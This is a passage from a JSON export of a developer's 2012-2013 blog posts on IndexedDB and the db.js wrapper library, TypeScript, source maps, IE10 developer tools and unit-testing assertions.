all that often. If I want to inspect network traffic then I’m going to use Fiddler, I see no point in use any of the browsers tools for that. As for the profile tab, it’s good but I don’t often find myself trying to analyse the JavaScript performance of a page (and when I do it’s generally find that it’s Knockout or jQuery that’s causing the performance problems).\nThe last few years has seen the IE team put in the hard yards to get IE back to being a highly competitive browser in the current market for users so I hope that they start focusing on making IE a competitive browser for the web developer.\n", "id": "2013-01-14-ie10-console-thoughts" }, { "title": "The problem with Assert.IsTrue", "url": "https://www.aaron-powell.com/posts/2013-01-08-the-problem-with-assert-istrue/", "date": "Tue, 08 Jan 2013 00:00:00 +0000", "tags": [ "unit-testing", "opinionated", "ranting", "rant", "testing" ], "description": "It's time for another rant, this time it's with how some people write their unit tests", "content": "Have you ever seen a unit test that looks like this:\n1 2 3 4 5 6 7 8 public void SomeTest() { var foo = new Bar(); var result = foo.GetStuff(); Assert.IsTrue(result.Count() == 1); } Do you know what’s wrong with this test? I’ll give you a clue, the developer use Assert.IsTrue and by doing so they’ve made a bad test.\nI see a lot of tests which contain Assert.IsTrue and 9 times out of 10 I cringe when I see it. Why? Those 9 times they have performed some kind of equality test and by doing so are making it difficult to determine what a failure is when it happens and more importantly you’ve introduced logic into your assertion so you’ve stopped asserting against values and started asserting against an operation.\nTake the above test and what happens when the equality is false? Well obviously the test has failed but all your test runner will be able to tell you is just that, the equality is false. Is this because the number of results is less than 1? Greater than 1? How many are we out by? What is the actual value?\nAll of this information is lost by the equality statement!\nHere’s a tip, use Assert.AreEqual! Every testing framework I’ve worked with has this method, or something that is pretty much that. Then you can write this:\n1 2 3 4 5 6 7 8 public void SomeTest() { var foo = new Bar(); var result = foo.GetStuff(); Assert.AreEqual(1, result.Count()); } Now when your test fails the runner will tell you something along the lines of Expected 1 but got 0. This makes it much easier to work out what’s wrong and fix your test.\nThat said if you’re asserting against a Boolean property/result/etc then by all means use Assert.IsTrue or Assert.IsFalse (don’t Assert.IsTrue(!somethingFalse), that’s just stupid).\nTL;DR - Don’t use Assert.IsTrue when there are specialised assertion methods to do it for you, they’ll give you better feedback when a test fails.\n</rant>\n", "id": "2013-01-08-the-problem-with-assert-istrue" }, { "title": "Thoughts on TypeScript", "url": "https://www.aaron-powell.com/posts/2013-01-07-thoughts-on-typescript/", "date": "Mon, 07 Jan 2013 00:00:00 +0000", "tags": [ "javascript", "typescript" ], "description": "Some of my impressions from trying to implement something in TypeScript", "content": "When TypeScript was announced I was pretty skeptical of it. I’ve been doing JavaScript development for a while now, I know many of the ins and outs of JavaScript development and I’ve never seen any problem with the syntax or the lack of type system.\nBut like a good skeptic I wanted to reserve my opinion until I had a chance to actually use it. This was the same approach which I took with CoffeeScript, you don’t really know something until you’ve made something with it (and for the record I wasn’t particularly fussed by CoffeeScript).\nWell I decided to do this, I wrote a small library called mathy and I wanted to share some of my thoughts from having made something with it. Keep in mind this is only a small library so it’s not exactly extensive, but I feel it’s a good start.\nProject backgroundI just want to clarify a few things about how I did this project:\nI used Sublime Text 2 as my editor, not Visual Studio This is written primarily as a Node.js package but I also want it to work in the browser The repository should contain the TypeScript source and the output JavaScript, consumers shouldn’t be forced to use TypeScript if they don’t want to The good The compiler errors can be nice, caught a few spelling errors and API usage errors through them which I wouldn’t have caught until runtime/while the tests were being executed Debugging is fine. Even though I’m not debugging the TypeScript (since it’s run as the compiled JavaScript through Node.js I don’t have source map debugging) the JavaScript looks close enough to my original code that it’s pretty obvious as to where I’m at Being able to create modules using a keyword is good, save a bunch of boilerplate guff I’ve used a class for part of the API which is very handy and easy to use, but most importantly it’s syntactically simple It doesn’t try and stop me from writing any of the funky stuff that I actually want to write ;) Fat-arrow => is really sweet, I’d never really got into CoffeeScript enough to have built anything much but I can see why those guys rave about it The bad If you’re not using Visual Studio it’s kind of a pain, Sublime Text 2 only has syntax highlighting support so you don’t exactly get much benefit, no intellisense or anything The fact you can’t programmatically use the compiler sucks. Even though TypeScript’s compiler is available as a Node.js package you have to execute the compiler yourself and pass in the input. It’d be nicer if you could just require('typescript') instead of what I have to do in the Makefile The way modules are generated can be a real pain if you’re trying to target the browser and Node.js. If you want to go with CommonJS the internal modules they generate create a global variable to store your object in, but that won’t work in Node.js as the variable isn’t exported. If you make it a public module it assumes there is a public “exports” object to attach to which is fine in Node.js but sucks in the browser! I had to have a shitty implementation to get it working that assumes in the browser there is the exports object. You can use the AMD support but it forces you to use RequireJS (or CurlJS or any other loader). It’d be nicer if there was optional AMD support, like how I have it done in db.js, so you can have something that will export as a AMD if AMDs are available, otherwise just be a global object There seems to be no way to plug a definition file into Node.js so all my unit tests are just written in plain JS which really sucks as I changed the API and didn’t realise until every single unit test failed The really shitty The generated code isn’t in a closure scope unless you use a module, which in turn the closure scope is really ridged (particularly from the CommonJS module point of view) which means You can’t create interfaces in a function You can’t create classes in a function You can’t create modules in a function (ok, I kind of get this one) ConclusionSo with all that considered what’s my thoughts so far? I actually do like it, particularly the way the compiler can catch some stupid mistakes. I’d like to try it on a much bigger project, particularly something in Visual Studio to see how well that goes, especially by having things like intellisense working.\nThe biggest problem I see is the module system, it’s really shit if you don’t do exactly as Microsoft does, and here in lies the problem. If you want to load in third party libraries it really doesn’t work too nicely, you end up with any type declarations around which really isn’t helpful.\n", "id": "2013-01-07-thoughts-on-typescript" }, { "title": "2012, a year in review", "url": "https://www.aaron-powell.com/posts/2013-01-06-2012-a-year-in-review/", "date": "Sun, 06 Jan 2013 00:00:00 +0000", "tags": [ "year-review" ], "description": "Time for yet another year in review", "content": "It’s about that time again but I’m a bit delayed in getting it done, it’s time for a year in review!\nBacking up from the busy year that was 2011 I…\nKept my MVP and got to go to the MVP summit in Seattle Went to the first Codemania in NZ to hang out with some of the guys in the NZ dev community Had first Pluralsight course on JavaScript design patterns was published Played the hipster dev for my DDD Melbourne talk this year, taking about developing everything in the browser, which was based off a similar talk from Web Directions What Do You Know Released my first Windows 8 application which needs some serious TLC, damn lack of free time :( Made a surprise appearance at CodeGarden 12, helped killed Umbraco 5, pointed out that MVC has always been possible with Umbraco and once again encouraged people to get involved in Umbraco which has been going really well since then Stepped out of my comfort zone and did some XAML but I’m still unconvinced by it Presented at Teched again, this time on Win8 app dev with HTML and JavaScript where I was kind of just ranting :P Dived into IndexedDB and released a wrapper library called db.js to deal with some of the shitty API points Played with TypeScript, the Microsoft answer to “the JavaScript problem”. My blog about using source maps for TypeScript was by far my most popular post Got engaged and bought a house (cuz you know, sometimes I get off the computer…) It’s been a bit quieter than in the past few years, but a much more maintainable a pace I think. Now to prepare for 2013…\n", "id": "2013-01-06-2012-a-year-in-review" }, { "title": "Chrome support for db.js", "url": "https://www.aaron-powell.com/posts/2012-10-18-dbjs-chrome/", "date": "Thu, 18 Oct 2012 00:00:00 +0000", "tags": [ "indexeddb", "chrome", "web" ], "description": "A little word on the db.js support for Chrome", "content": "I recently had a bug opened on db.js which is related to Chrome operating differently to the other browsers.\nAfter spending some time digging into the problem I came to realise that the problem was to do with the way older versions of Google’s Chrome implement IndexedDB (where older versions are any version prior to Chrome 23).\nPrior to Chrome 23 Chrome didn’t support the final specification for IndexedDB completely, in fact they were still implementing the spec from April 2011 and the root of the problem was how changing database versions worked.\nTL; DRdb.js will not be supporting Chrome 22 or lower, even if they have webkitIndexedDB defined.\nLonger storyTo understand the problem we need to understand what changed in the specification between April 2011 and today. The change that is causing the most problems is how IndexedDB handles new versions of each database. In case you missed it, when you open a database with db.js (or well just IndexedDB) you need to provide a version number for the schema. This is because a database can change across versions and IndexedDB allows you to maintain the old schema.\nInitially the way version changes were handled was using a setVersion method, like so:\nvar req = indexedDB.open('db'); req.onsuccess = success; req.onerror = fail; function success(e) { var db = e.target.result; var req = db.setVersion("1"); req.onsuccess = createSchema; req.onerror = fail; } function createSchema(e) { //create schema } The problem is that this was changed, instead of using this method to change a schema version it was added to the open call and is used in conjunction with a onupgradeneeded event off the request, like so:\nvar req = indexedDB.open('db', 1); req.onupgradeneeded = createSchema; req.onsuccess = success; req.onerror = fail; Personally I’m quite glad that they made this change, I think it makes for a much cleaner API as you don’t have nested database requests. But ultimately this was a very radical change to the way the API worked.\nThe Chrome problem Chrome was the last browser to adopt this change, drilling down through the changeset history, issue history and mailing list archive it was apparent that the Chrome team was reluctant to just drop the support for setVersion like the other browsers because they were concerned about existing implementations and this is a fair enough justification, no one wants to introduce breaking changes.\nThe problem was there was no good way to tests for this change. Initially db.js did have attempted smarts as to how it will handle database version changes but the problem was that there was no way to detect for the existence of the onupgradeneeded event, only the setVersion method. Interestingly enough even through Chrome 23+ does support the onupgradeneeded it also has setVersion. As you can expect this added a lot more complexity to the code!\nUltimately what it came down to was it was overly complex to support both versioning methods, so I made the decision that any implementation that uses setVersion and not onupgradeneeded it won’t work as in the time it would take to resolve the problems I was seeing Chrome 23 will make it to the stable channel.\n", "id": "2012-10-18-dbjs-chrome" }, { "title": "Reverse order unique queries in IndexedDB", "url": "https://www.aaron-powell.com/posts/2012-10-08-reverse-order-unique-indexes/", "date": "Mon, 08 Oct 2012 00:00:00 +0000", "tags": [ "indexeddb", "web" ], "description": "The quirk of reverse index querying in IndexedDB and in turn db.js", "content": "In my post my db.js querying I covered how to do reverse unique queries with db.js using the desc().distinct() method chaining which will query an index for the unique items, but it’ll do it in reverse order, essentially it will set a IDBCursor direction of prevunique.\nWhen covering off I mentioned that the way it works is a little unusual and here I’ll explain why.\nHow an index “looks”So you’ve got an index in your object store, an index which is non-unique, and it contains duplicate values. Say you created an index like this:\nstore.createIndex('foo', 'foo', { unique: false }); Next you’ve pushed a few items into it:\nstore.add({ foo: 'bar' }); store.add({ foo: 'bar' }); store.add({ foo: 'baz' }); The data which has been stored in the index can be visualised as so:\nKey Value bar { id: 1, foo: 'bar' } bar { id: 2, foo: 'bar' } baz { id: 3, foo: 'baz' } Walking our indexFrom the diagram you can see the order of the data in our index, let’s assume we’re wanting to just walk through the index normally, using the next direction (the default if you don’t set anything). We’ll get back the records in the order of id 1, 2, 3, or by their key, bar, bar, baz. Now this makes sense, we’re walking top-to-bottom just as the spec states and as we’d expect from looking at our index.\nNow let’s turn that into a nextunique query, this time we get back the records with the id 1, 3, or the index keys bar, baz.\nThis is again to be expected, if you review the spec it states (emphasis is mine):\n“nextunique”. This direction causes the cursor to be opened at the start of the source. When iterated, the cursor should not yield records with the same key, but otherwise yield all records, in monotonically increasing order of keys. For every key with duplicate values, only the first record is yielded. When the source is an object store or a unique index, this direction has the exact same behavior as “next”.\nSo what’s interesting here is that there are deterministic rules as to how the item to be returned is selected from the index, basically it’s what ever is first in the index for that key. This is basically what we’d expect, no surprised so far.\nWalking backwards through our indexWe’ve looked at walking forward through our index, but what if we want to walk backwards through it? Well that’s where the prev cursor direction is for. Say we were to do a read-all operation using a prev cursor, we’ll have the records in the order of id 3, 2, 1, or baz, bar, bar.\nNot particularly shocking here, again that’s what we’d be expecting, we’ve started at the end of the index and we’ve grabbed the item then gone to the one before it in the index and so on.\nNow it’s over to the prevunique query so that we can get just a unique item for each index key from our index. The items we get back have an ID order of 3, 1 or the index keys baz, bar. Wait something doesn’t look right there, the ID’s were:\n3 1 And this is where it starts getting confusing…\nUnderstanding prevunique Let’s have a look at the spec for prevunique (emphasis is mine):\n“prevunique”. This direction causes the cursor to be opened at the end of the source. When iterated, the cursor should not yield records with the same key, but otherwise yield all records, in monotonically decreasing order of keys. For every key with duplicate values, only the first record is yielded. When the source is an object store or a unique index, this direction has the exact same behavior as “prev”.\nDo you see the confusing point, it states that when a duplicate item is found of a key you take the first record and this is where I was tripped up. When I first read this I took it as the first record found in the index, so when walking backwards in our example index above, we would get the ID of 2 as it was the first record with the bar key. But this is not the case, it is actually the first record in the index with that key, and since the record with the id 1 appears first in the index it will be returned. The key order is correct, we’ve reverse-walked it based on that, but it was the item order that trips people up. In fact I raised a bug on Chrome as I was assuming that they had got it wrong. The bug has since been closed as it is implemented correctly.\nThe order can be summed up as:\nReverse order by keys, items by index position\nConclusionThe way IndexedDB handles reverse index walking is a little bit confusing on first read, but the more you review it the more that it starts to make some sense.\nCurrently IE10 doesn’t handle this correctly though, it incorrectly reverses the order of the items in the index, I raised the question to them and you can find out more in the thread on the mailing list.\nAdmittedly this is a pretty esoteric problem to come across though, I can’t think of an instance where the ordering of items in an index when traversed in reverse would be important, but then that may really just be a failure of imagination. If order is really that important you’re probably best structuring your data so that the key can be unique.\n", "id": "2012-10-08-reverse-order-unique-indexes" }, { "title": "How the browsers store IndexedDB data", "url": "https://www.aaron-powell.com/posts/2012-10-05-indexeddb-storage/", "date": "Fri, 05 Oct 2012 00:00:00 +0000", "tags": [ "indexeddb", "web" ], "description": "A starting point for learning where and how ", "content": "As you’ve probably noticed I’ve been doing a lot of digging into IndexedDB across the various browsers but there’s one thing that I find quite interesting, how it all works. So for the TIL session we’ve going to find out how the browsers store the data for IndexedDB*.\n*Note: This will be a pretty high-level look since I’m sooo not a C++ developer and C++ is the primary language of browser engines :P.\nInternet ExplorerWe’ll start with the first browser to go unprefixed for IndexedDB, IE (well IE10), also since we can’t look at the source of IE most of this is speculative.\nInternet Explorer uses the Extensible Storage Engine as its underlying storage model. This is the same database format that many of Windows features use including the Desktop Search (very common in Windows 8), Active Directory on Windows Servers and even Exchange.\nESE seems like a good idea for IndexedDB as it has many of the features that you’re going to want such as keys, indexes and multi-value indexes* so I’m not surprised that the IE team have built on top of what is already there.\n*Side point - IE currently doesn’t support multiEntry indexes from IndexedDB which really sucks, especially since ESE seems to support it natively :(.\nIf you’re curious to go digging around for your IndexedDB files you’ll find them at:\n%AppData%\\Local\\Microsoft\\Internet Explorer\\Indexed DB\\Internet.edb\nSo far I haven’t had much luck getting into this file to view the database contents, I’ve tried EseDbViewer but it fails to open the database files and trying to dig through the Windows API itself is just plain unpleasant. Nobody likes COM.\nFirefoxFirefox was the 2nd browser to go prefix free with IndexedDB, it is unprefixed as of version 16. Logically since Firefox is a cross-platform browser they use a cross-platform database, SQLite. It’s also not surprising that they are using SQLite as IndexedDB replaced the WebSQL proposal which was based on SQLite (one of the reasons cited as to discontinuing WebSQL was everyone used SQLite so they weren’t getting independent implementations), so it makes sense that they salvaged what they could from the first implementation of a complex storage model.\nBeing open source you can browse the code for Firefox’s IndexedDB implementation which is awesomely mind bending. Check out the OpenDatabaseHelper.cpp, it’s responsible for setting up your database connection as well as doing a bunch of SQL to make sure everything is ready for data (yep, Firefox has SQL statements in it!). Another file of interest is IDBObjectStore.cpp and the line I’ve linked to is the method that is responsible for inserting a new record into the database (at least I’m pretty sure it is).\nIf you are wanting to look into your database then the easiest way is with the SQLite Manager Firefox extension. The files created for IndexedDB are stored in the following location:\n%AppData%\\Roaming\\Mozilla\\Firefox\\Profiles\\your profile id\\indexedDB\\domain\nOpen up the SQLite Manager extension and then you can dive into your database.\nChrome / WebKitAt the time of writing the IndexedDB implementation of WebKit, and by extension Chrome, is still prefixed, in fact they are prefixing pretty much everything IndexedDB related with webkit. The implementation seems to be driven by the Chrome team and that probably also indicates why they are using a Google produced database, LevelDB.\nNote: The implementation is already in the main WebKit repository which means that sooner or later it will appear in Safari as they also use WebKit under the hood.\nYou can browse the source of their implementation in all its C++ glory, it really is quite nicely written, at least to my untrained C++ eyes. The actual storage of the data is done through the IDBLevelDBBackingStore.cpp class, but exposed as an abstraction so I guess it can be swapped out (and I’d guess that’s how they swapped between SQLite and LevelDB to begin with). The one thing that I do find curious is that LevelDB doesn’t support indexes yet obviously IndexedDB does, so there’s probably some trickery going on when they are pushing the data into the database (and well it hurts my head to read that much C++ :P).\nThere isn’t any stand-alone viewer for LevelDB that I’ve come across but really that’s not that big a deal as currently Chrome is the only browser who has an IndexedDB inspector built into its developer tools. Just navigate to the Resources tab and there’s an IndexedDB section (you may have to right click -> refresh the node as it’s not a live view). I do hope the other browser vendors bring this feature in as well as it’s really quite neat to have. But if you really must find the files for IndexedDB then they are located here:\n%AppData%\\Local\\Google\\Chrome\\User Data\\Default\nNote: If you’re using Chrome Canary then it’s in the Chrome SxS folder.\nConclusionTIL:\nIE uses the same database format as Exchange and Active Directory for IndexedDB Firefox is using SQLite so are kind of implementing a NoSQL database in to SQL database Chrome (and WebKit) are using a Key/ Value store which has heritage in BigTable C++ is no less scary than when I was at uni ", "id": "2012-10-05-indexeddb-storage" }, { "title": "Interesting finds in the IE10 UA switcher", "url": "https://www.aaron-powell.com/posts/2012-10-04-ie10-user-agent-switching/", "date": "Thu, 04 Oct 2012 00:00:00 +0000", "tags": [ "web", "debugging" ], "description": "How had I missed all this before?", "content": "I was looking around in the IE10 developer tools today and dug into the Tools -> Change user agent string menu and came across some interesting UA options:\nHow did I miss that IE10 in Windows 8 RTM has built in User Agents for IE10 for Windows Phone 8 and IE for Xbox?\nThat’ll teach me to only ever use the Browser Mode options…\n", "id": "2012-10-04-ie10-user-agent-switching" }, { "title": "Using Source Maps with TypeScript", "url": "https://www.aaron-powell.com/posts/2012-10-03-typescript-source-maps/", "date": "Wed, 03 Oct 2012 00:00:00 +0000", "tags": [ "typescript", "debugging", "web" ], "description": "Another quick look at what you can do with TypeScript", "content": "Have you heard of Source Maps? Source Maps are an idea that has come out of Mozilla for addressing the debugging issues that are raised by *-to-JavaScript compilers and JavaScript minifiers, the problem is that when you use these you ultimately aren’t debugging what you wrote.\nTake TypeScript for example and the improved version (original) of the PubSub from yesterday, we’ve got a problem, the code is quite different to what we’d be running in the browser. This is a big problem as if you’re not familiar with JavaScript, or at least not comfortable with the language nuances, you’ll quickly get lost and make a royal mess of what you’re writing.\nSource Maps for TypeScriptIntelligently the TypeScript team have already done the hard work for us, there’s a Source Map generator in the compiler (thanks Ryan for pointing it out)!\nSo how do you use it? If you do a help dump of tsc (the TypeScript compiler) there’s nothing in it:\nD:\\Code> tsc -h Syntax: tsc [options] [file ..] Examples: tsc hello.ts tsc --out foo.js foo.ts tsc @args.txt Options: -c, --comments Emit comments to output --declarations Generates corresponding .d.ts file -e, --exec Execute the script after compilation -h, --help Print this message --module KIND Specify module code generation: "commonjs" (default) or "amd" --nolib Do not include a default lib.d.ts with global declarations --out FILE Concatenate and emit output to single file --target VER Specify ECMAScript target version: "ES3" (default), or "ES5" @<file> Insert command line options and files from a file. Well good news everybody, that’s not listing all the compiler switches ;). Check out the batchCompile method for a bunch of gems, but most importantly there is a sourcemap switch, so if I take my little project:\nD:\\Code\\typescript-pubsub> tsc -sourcemap pubsub.ts Now you’ll have two files, pubsub.js and pubsub.js.map and the output JavaScript file will also contain the source map pointer:\n//@ sourceMappingURL=pubsub.js.map Sweet! Let’s open the HTML file in Chrome Canary (of which I’ve already enabled Source Maps) and we get some cool new debugging stuff:\nYou can find your .ts file in the sources list.\nI’ve break pointed inside of TypeScript!\nInspecting variables in TypeScript\nConclusionThe fact that there was enough forward planning from the TypeScript team to include support for Source Maps in the initial release is a really great thing. Through the magic of Chrome we can debug code written in it as through it was our original code. If you want have a play here’s the code.\nHopefully either the Visual Studio or IE (or both) team also pick up Source Maps and add support for them too.\nHappy cross-compiling.\n", "id": "2012-10-03-typescript-source-maps" }, { "title": "Indexes and Queries in db.js", "url": "https://www.aaron-powell.com/posts/2012-10-02-dbjs-indexes-and-queries/", "date": "Tue, 02 Oct 2012 00:00:00 +0000", "tags": [ "indexeddb", "web", "winjs" ], "description": "An overview of how to create indexes and execute powerful queries against them using db.js", "content": "In my last post I introduced a new library I’ve been working on for IndexedDB called db.js.\nOne thing that I was slow in my understanding of with IndexedDB is how indexes work, and just how powerful they can be. Now that I’ve got that down pat the support in db.js is greatly improved. Also a big shout out to Bob Wallis who did a great job at adding the initial revision of index range queries.\nCreating a key pathWhen creating an object store, or table if you will, you’re most likely going to want to have some kind of unique identifier for each record; this is what the role of the key path is. To create a key path when you define the schema for your database you can provide it with the key property:\ndb.open({ name: 'my-app', version: 1, schema: { people: { key: { keyPath: 'id', autoIncrement: true } } } }); What I’ve done here is defined that I want to have a property added to my objects called id which will be auto-incrementing (which will make it a number). Now when I add a new person the object will have a new property:\nserver.people .add({ firstName: 'Aaron', lastName: 'Powell' }) .done(function (person) { console.log(person.id); //on a clean db this will be 1 }); This key is useful if you want to access unique records from your store.\nCreating an indexWhile a key path is useful for a narrow set of scenarios it’s likely that you’ll be doing queries that are against other information in the store. Let’s take our example and say we wanted to be able to query against the firstName property. For this we would want to create a non-unique index for our records:\ndb.open({ name: 'my-app', version: 1, schema: { people: { key: { keyPath: 'id', autoIncrement: true }, indexes: { firstName: { } } } } }); Now if we were to inspect our person store we would find an indexName of firstName. This allows us to perform queries against said index and have it perform much faster than manually filtering the records ourselves, especially in large data sets.\nYou can create multiple indexes here by adding more properties to the indexes property on the schema. If you want to set any of the index parameters (IDBIndexParameters) you can provide them as properties of the object for the index.\nQuerying an indexInitially I didn’t really wrap my head around indexes very well and when I started db.js there wasn’t a whole lot of useful IndexedDB articles, most of the stuff you had to work out by reading the specification (which is so not written for consumers of an API!). Luckily now db.js has really good support for indexes and how you can query them.\nLet’s look at how we could query an index for all people with the first name of Aaron:\nserver.people .query('firstName') .only('Aaron') .execute() .done(function (people) { //Do stuff with all the Aaron's }); The first thing that’s different compared to the query in my last post is when we invoke the query method we are providing it with the name of the index we want to query.\nNext off we’re using the only method. This method opens up a IDBKeyRange of type only which will then select values that match that value exactly. This is very quick for reducing the amount of records returned from the object store itself.\nQuerying across rangesSometimes you want a range of data, say you want people who are in a certain age bracket. Let’s pretend that we have a numerical age property on our person object and we’ve created an index for it exactly the same way we created the firstName index. Now through the magic of db.js (well, IndexedDB :P) we can perform a set of range queries:\nserver.people .query('age') .lowerBound(28 /*, true */) //by default it's an inclusive query, set to `true` to be exclusive .execute() .done(function (people) { //all the people who are 28 years or older }); server.people .query('age') .upperBound(28 /*, true */) //by default it's an inclusive query, set to `true` to be exclusive .execute() .done(function (people) { //all the people who are 28 years or younger }); server.people .query('age') .bound(25 ,35 /*, true , true */) //by default it's an inclusive query, set to `true` to be exclusive .execute() .done(function (people) { //all the people who are between 25 and 35, inclusive }); This shows the usage of:\nlowerBound Get records using the provided value as a starting point Optional second argument to if we want an exclusive query instead of inclusive, which is the default upperBound Get records using the provided value as an ending point Optional second argument to if we want an exclusive query instead of inclusive, which is the default bound Gets values between a range The 3rd and 4th arguments represent the exclusive nature, both default to false, implying inclusive but you can control the boundaries individually These methods are from IndexedDB in pretty much their raw format but exposed in db.js so we can easily use the chaining to do the querying. And the advantages of these ranges is the same as when you look at a real database, we only take a subset of the record set so it should be quicker.\nAdvanced querying of indexesSo now we’ve got the basics down of creating a query against an index let’s look at some of the more advanced features of db.js’s query API.\nSort order By default db.js (well more accurately IndexedDB) will return your data in ascending order. Assuming we’ve stored the following information:\nvar people = [{ firstName: 'Aaron', lastName: 'Powell', age: 28 }, { firstName: 'John', lastName: 'Smith', age: 30 }, { firstName: 'Bill', lastName: 'Jones', age: 50 }]; We’ve got three people with three different ages. If we were to do a bound query of bound(25, 35) we’ll have the records returned in the order of ‘Aaron’ then ‘John’. What if we want that order reversed?\nEasy, add a desc call:\nserver.people .query('age') .bound(25 ,35) .desc() .execute() .done(function (people) { //all the people who are between 25 and 35 }); With the desc call we tell IndexedDB that we want to use IDBCursor.prev which will tell IndexedDB to go backwards through our index.\nUnique items When you create an index you can specify if you want the data to be unique but often this wont be the case, you just want to have an index of commonly searched terms. But what if you want to get just a single entry for each record out of the index, regardless of how many there are. A use case for this would be you want to know how many unique first names there are in your store. For this we can use the distinct method:\nserver.people .query('firstName') .all() .distinct() .execute() .done(function (people) { //only one entry per name }); The distinct method also augments the IDBCursor state by using nextunique or prevunique cursor directions which the clued in reader will realise means you can do a descending unique query as well as an ascending unique query.\nNote: The way prevunique works is a little confusing and better covered off in a separate blog post.\nUnique keys While the previous example is good it is not exactly what we wanted for the scenario laid forth. Even though we’re able to query the index and get back the unique records we get back the whole record. This is somewhat problematic as we’re still pulling out more data than we really would want to be getting out, for the scenario we only wanted the keys. Well we can get just that information out if we need to:\nserver.people .query('firstName') .all() .distinct() .keys() .execute() .done(function (names) { //only one entry per name }); By adding the keys() call we use an openKeyCursor call in IndexedDB, giving us just the keys that the index has. We can also use that in a range query:\nserver.people .query('age') .bound(25, 35) .distinct() .keys() .execute() .done(function (ages) { //only one entry per age }); This time we’ll know what ages are covered by our data set.\nA key query doesn’t have to be unique though, say you want to know how many entries you have for each key:\nserver.people .query('firstName') .only('Aaron') .keys() .execute() .done(function (names) { //only the keys, if you have multiple entries of one key then you will get multiples in the result set }); This would be useful if you wanted to create a heat map from an index, you could do a map/ reduce to calculate:\nserver.people .query('firstName') .all() .keys() .execute() .done(function (names) { var dataMap = names.map(function(x) { return { key: x, count: 1 }; }); var dataGrouped = {}; dataMap.forEach(function (x) { if (!dataGrouped[x.key]) { dataGrouped[x.key] = x.count; } else { dataGrouped[x.key]++; } }); console.log(dataGrouped); }); Record counting Need to know how many items there are that match a query? Useful if you’re implementing a paging system. Well you could perform your query and check the length of the result set or alternatively you could use the count method and not wait for the entries to be hydrated:\nserver.people .query('firstName') .only('Aaron') .count() .execute() .done(function (count) { //the number of records matching the query }); Note: This time the argument provided to the done handler won’t be an array, it will be a number.\nCompletely custom filtering The indexes in IndexedDB are only single key indexes so there are times that you’re going to be trying to create a query in a way that can’t be done, say you want to query against two properties. Well that’s not going to be possible to do with an index and this is where db.js can help.\nWith db.js there is a filter method that is exposed, this method allows you to provide it with a function that will be used to filter the results, this function must return a boolean result (true if you want the record, false if you don’t). You can add as many of these as you want, but be aware of the performance hit that you may take as essentially they are provided to the Array.filter method:\nserver.people .query('firstName') .only('Aaron') .filter(function (person) { return person.lastName === 'Powell'; }) .execute() .done(function (people) { //only the Aaron Powell's of the world }); Ideally you want to be using this in conjunction with an index. As you’ll see in the above example I’m doing an initial only query to reduce our dataset base on the first names and then doing an additional filter against the persons last name to reduce our dataset event more. The filter method doesn’t have to be applied to an index though, if you don’t have an index that can represent the data you want back (say you’re implementing search) you can call filter directly off the query method.\nConclusionThroughout this post we’ve dived deeper into the query engine of db.js, and by extension got a better understanding of how IndexedDB’s indexes work.\nWe’ve looked at how to create a primary key of such in our object store through the schema mechanism of db.js.\nNext we looked at how to create custom indexes against any property on our object in our store. We then took this and looked at how to go about querying against the index in a variety of different ways that are exposed in db.js.\n", "id": "2012-10-02-dbjs-indexes-and-queries" }, { "title": "PubSub in TypeScript", "url": "https://www.aaron-powell.com/posts/2012-10-02-pubsub-in-typescript/", "date": "Tue, 02 Oct 2012 00:00:00 +0000", "tags": [ "typescript", "javascript", "web" ], "description": "It's that time again, time for more Pub/Sub!", "content": "Pub/Sub is my Hello World, I’ve done it not once but twice in JavaScript and once in CoffeeScript (although technically that has a 3rd version in JavaScript at the start of the post :P).\nWell you may have heard of Microsoft’s answer to application-scale JavaScript called TypeScript so I thought I’d write a pub/ sub library in it too.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 module PubSub { var registry = {}; var pub = function(name: string, ...args: any) { if (!registry[name]) return; registry[name].forEach(x => { x.apply(null, args); }); }; var sub = function(name: string, fn: any) { if (!registry[name]) { registry[name] = [fn]; } else { registry[name].push(fn); } }; export var Pub = pub; export var Sub = sub; } It’s pretty simplistic and I’ve gone with using the Array.forEach method rather than just a normal for loop for no reason other than I felt like it.\nIt could be used like so:\n1 2 3 4 5 6 7 8 9 10 11 PubSub.Sub("foo", function(...args: any) { args.forEach(x => { console.log("argument", x); }); }); PubSub.Pub("foo", 1, 2, 3, 4, 5); setTimeout(() => { PubSub.Pub("foo", "a", "b", "c"); }, 1000); See, it’s just a pub/ sub library.\nThere is a few interesting thoughts here though:\nfunction is not valid as an argument constraint I’m assuming that’s just a limitation in the current compiler, you have to use any instead They have splat support, ...args, which is another ES6 proposal and can be quite useful I couldn’t work out how to define a class or interface to accurately represent what registry is, since it’s really an expando object You always have to do export var <member name> = <what to export>, this annoyed me as I like to define everything up front and then later selectively export. I kept getting errors with export pub because I didn’t have a var in there ConclusionFor me it’s pretty meh an experience. I’ve been doing JavaScript for long enough that the features added to language thus far aren’t a really compelling reason to go and write it over JavaScript.\nWhat I have liked is the ability to use ES6 idioms (splats, modules, etc) is nice.\nI’m curious to see what other things it will drive cough source maps cough in the future, but for the time being I’m not going to convert all my JavaScript files over.\n", "id": "2012-10-02-pubsub-in-typescript" }, { "title": "Hello db.js", "url": "https://www.aaron-powell.com/posts/2012-10-01-hello-dbjs/", "date": "Mon, 01 Oct 2012 00:00:00 +0000", "tags": [ "indexeddb", "web", "winjs" ], "description": "An introduction to db.js, an IndexedDB wrapper.", "content": "I’m going to make the assumption you’re somewhat familiar with IndexedDB in this post, if you’re not check out this tutorial.\nIf you’ve spent any time looking at IndexedDB you’ll have to agree that the API leaves a lot to be desired. Look IndexedDB is a great feature of modern browsers but the problem is that its API is not really designed around modern JavaScript practices.\nIn particular I really dislike that you have to do stuff like this:\nrequest.onerror = function(event) { // Do something with request.errorCode! }; request.onsuccess = function(event) { // Do something with request.result! }; It really starts getting convoluted when you’re working with the events on the different request objects. Even opening the initial database can be quite ugly, if the version number has changed then you need to handle that event before the success event, doing migrations and all kinds of stuff.\nThe other ugliness starts coming into play when you want to hide your database code behind a public facing API, you’re constantly having to take in callback arguments and it’s Christmas trees all around.\nOn top of this if you look at the code above it feels very reminiscent of old-IE event wire-ups, onclick and all that fun stuff, but today the Promise callback pattern is a much more popular one (you’ve probably seen it in jQuery) as it does a great job of standardizing how you provide callbacks.\nThis was my impression when I started with IndexedDB so I decided that I’d address it in my own way.\nHello db.jsI created a simple little library called db.js which aims to simplify the problems I was finding with IndexedDB’s API. It’s open source, it’s up on GitHub and it’s currently in production running my Pinboard for Windows 8 application.\nAddressing callbacksThe first design goal of db.js was to address the way callbacks were handled. As I said above I really dislike the .onsuccess = function () { ... }; syntax that IndexedDB uses 